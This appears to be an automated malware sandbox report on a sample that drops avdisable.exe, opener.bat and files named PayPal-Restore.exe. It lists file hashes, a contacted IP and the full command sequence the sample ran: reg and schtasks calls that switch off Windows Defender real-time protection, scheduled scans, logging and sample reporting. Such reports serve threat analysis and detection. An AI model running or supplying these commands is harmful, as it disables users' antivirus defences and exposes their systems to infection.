C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 086890d750b486ec89ca6e7edd4f2d7c
SHA1 5f393c2eac56b2ebf0b985e9ac065c7c5e515a7b
SHA256 3d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1
SHA512 33d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf

memory/3204-133-0x0000000000000000-mapping.dmp

memory/1268-135-0x0000000000000000-mapping.dmp

memory/4276-138-0x0000000000000000-mapping.dmp

memory/4012-143-0x0000000000000000-mapping.dmp

memory/1672-153-0x0000000000000000-mapping.dmp

memory/776-156-0x0000000000000000-mapping.dmp

memory/2352-158-0x0000000000000000-mapping.dmp

memory/736-161-0x0000000000000000-mapping.dmp

memory/232-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat

MD5 76b34b8a915e15e32871820b24a60556
SHA1 aabf1487a5dc1880d5c8a6979666b215dc09a837
SHA256 ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1
SHA512 2c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df

memory/392-167-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

memory/2952-170-0x0000000000000000-mapping.dmp

memory/324-164-0x0000000000000000-mapping.dmp

memory/2952-173-0x0000000000010000-0x000000000002A000-memory.dmp

memory/2952-174-0x0000000004960000-0x00000000049FC000-memory.dmp

memory/2684-163-0x0000000000000000-mapping.dmp

memory/2844-162-0x0000000000000000-mapping.dmp

memory/2584-160-0x0000000000000000-mapping.dmp

memory/4164-159-0x0000000000000000-mapping.dmp

memory/4392-157-0x0000000000000000-mapping.dmp

memory/4712-155-0x0000000000000000-mapping.dmp

memory/4968-154-0x0000000000000000-mapping.dmp

memory/3772-152-0x0000000000000000-mapping.dmp

memory/5104-151-0x0000000000000000-mapping.dmp

memory/4516-150-0x0000000000000000-mapping.dmp

memory/2036-149-0x0000000000000000-mapping.dmp

memory/1732-148-0x0000000000000000-mapping.dmp

memory/1348-147-0x0000000000000000-mapping.dmp

memory/552-146-0x0000000000000000-mapping.dmp

memory/2164-145-0x0000000000000000-mapping.dmp

memory/2172-144-0x0000000000000000-mapping.dmp

memory/4140-142-0x0000000000000000-mapping.dmp

memory/3592-141-0x0000000000000000-mapping.dmp

memory/4224-140-0x0000000000000000-mapping.dmp

memory/4260-139-0x0000000000000000-mapping.dmp

memory/4884-137-0x0000000000000000-mapping.dmp

memory/3404-136-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat

MD5 8760b15c6d12ecc70594fc8db876c68c
SHA1 b1d47a27bf45db9955f07c773a5a334e3b528a97
SHA256 9a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463
SHA512 0463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee

memory/4912-130-0x0000000000000000-mapping.dmp

memory/2952-175-0x0000000004A00000-0x0000000004A66000-memory.dmp

memory/2952-176-0x0000000005630000-0x0000000005BD4000-memory.dmp

memory/2952-177-0x0000000005F00000-0x0000000005F92000-memory.dmp